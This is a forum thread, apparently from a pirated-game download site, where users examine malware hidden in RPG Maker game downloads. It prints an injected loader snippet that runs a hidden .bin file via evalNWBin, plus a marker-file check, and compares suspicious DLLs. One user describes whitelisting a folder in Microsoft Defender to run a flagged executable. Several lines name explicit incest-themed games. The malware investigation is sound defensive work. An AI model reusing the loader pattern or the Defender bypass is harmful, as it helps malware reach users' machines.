So, I downloaded a game. Seijo Rinaria No Rakuyo. Nothing new.
After setting up, I opened it, and then it immediately closed. That was weird.
So I decided to go into the game files. Guess what. All the files in the data folder are just a variation of this.
I already had a bit of experience with this due to a dev who hid the encryption key of his game, so while curious, I wasn't alarmed. Though that dev only hid the System.json file.
When I entered the js folder, there was a weird .bin file there. I moved on and searched the .js files, and I got lucky. There were two interesting things there. Changed a few things on the code, just in case.
JavaScript:
if (typeof window._X === 'undefined') {
var p = require('path'); nw.Window.get().evalNWBin(null, p.join(process.cwd(), 'www', 'js', 'FILENAME.bin'));
}
JavaScript:
var fs = require('fs'), path = require('path'), FILENAME = 'obfuscated name of a .sys file on the same folder as Game.exe';
if (fs.existsSync(path.join(process.cwd(), FILENAME)) && typeof window.cDiv === 'undefined') {
//stuff;
}
I tried to comment the first one, and then the game just got stuck loading. I uncommented the code and removed the .bin file from the js folder, and then it threw an error.
So I went on to the second one. I managed to get the name of the .sys file it was trying to check for, but it wasn't there, so I made an empty .txt file, renamed it to the .sys one, and opened the game. The results are in the spoiler up there.
I had it opened from a different thing I was doing, so I got lucky detecting this. Can anyone check exactly what this is trying to do? Here's a download link for the maybe virus, and since it's from ryuugames.com, that's the password.
Seems like only the ryuu download is infected, I just downloaded one from two different sources (from the slow ones) and it's fine.
Ran fc on non-data files (.rpgmv and .json, since the ones from the other source don't have their .json files encrypted), and everything was the same (a few extra empty bits at the end of libEGL.dll and libGLESv2.dll though), except for the rpg_managers.js file. I'll just comment on the differences showing the original script.
JavaScript:
DataManager.loadDataFile = function(name, src) {
//virus code added a call to the .bin file
var xhr = new XMLHttpRequest();
var url = 'data/' + src;
xhr.open('GET', url);
xhr.overrideMimeType('application/json');
xhr.onload = function() {
if (xhr.status < 400) {
window[name] = JSON.parse(xhr.responseText);
DataManager.onLoad(window[name]);
//virus replaced the above two lines for a try catch, with everything following inside the try
//it checked for the .sys file to create a console thing
//after which it read the base64, did bitwise operations on it based on some function from the .bin file
//and finally it executed these two lines, the b variable is the base64 that was also modified
//window[name] = JSON.parse(b.toString('utf8').replace(/^\uFEFF/, ''));
//DataManager.onLoad(window[name]);
}
};
xhr.onerror = this._mapLoader || function() {
DataManager._errorUrl = DataManager._errorUrl || url;
};
//no idea why the virus also removed the above onerror function too
window[name] = null;
xhr.send();
};
Also, huh, a thread was made with the virus link, I think that should be changed, it has the corrupt script.
Some games containing the Miner issues that arose at the beginning of the year are still on this site, so please check if you are an uploader.
[RJ01522545] IDOL CONFLICT
I have reported the files I personally verified directly to the uploader, but I have not checked files uploaded by other uploaders.I suspect they are sharing files from the same source, so I would appreciate it if you could check.
Add:
The CRC values for libEGL.dll and libGLESv2.dll matched those of the trial version, confirming that the infection occurred after actually running the .exe file.
i compare Ryzen111 (left), Shine (middle), Otokonoko (right), and it seems the cryptbase.dll & d3dcompiler_64.dll was still on middle & right which i think was the virus dll before?
the only other difference is the resources.pak. the size on Shine & Otokonoko was 40753879 as for Ryzen111 was 5245483.
as for other i checked (ramori, nobodyknows22, UFO, Nihonjaki90) they all have cryptbase.dll too.
i compare Ryzen111 (left), Shine (middle), Otokonoko (right), and it seems the cryptbase.dll & d3dcompiler_64.dll was still on middle & right which i think was the virus dll before?
the only other difference is the resources.pak. the size on Shine & Otokonoko was 40753879 as for Ryzen111 was 5245483.
as for other i checked (ramori, nobodyknows22, UFO, Nihonjaki90) they all have cryptbase.dll too.
Please note, this sort of thing is WAY beyond my understanding, all I know was a couple games from senior respected uploaders triggered Microsoft Defender, but I have no way of knowing if it was just false positives (only about 4 out of about 80 downloads)
If one of the Experts here could check the files out & see if there is nothing wrong with them, thank you very much, I know how important your time is.
Digital G Power:
Monoshizuka de Bijin no Mama ni Gouin ni Kyousei Shaseisaserareru Boku____物静かで美人のママに強引に強制射精させられるボク
Just unzipping the file causes Microsoft Defender to quarantine the Game.exe
I had to Whitelist all contents in the folder I unzipped the .rar into to stop the .exe from autodeleting
& i think I had to add "2djgame.txt file" to Game Folder to get it to run, but I don't remember how I found that out (while the game runs smoothly after all that, it still leaves me uneasy, but I'm a MASSIVE Mom+Son Inbreeding Addict, it's like literal heroin{e} to me)
Most Other games I downloaded from here seemed fine, except 2 from a small developer called Inohead Games:
Bitch KazokuFile____ビッチ家族変態な日常
ESG-001200 by Esan?
...
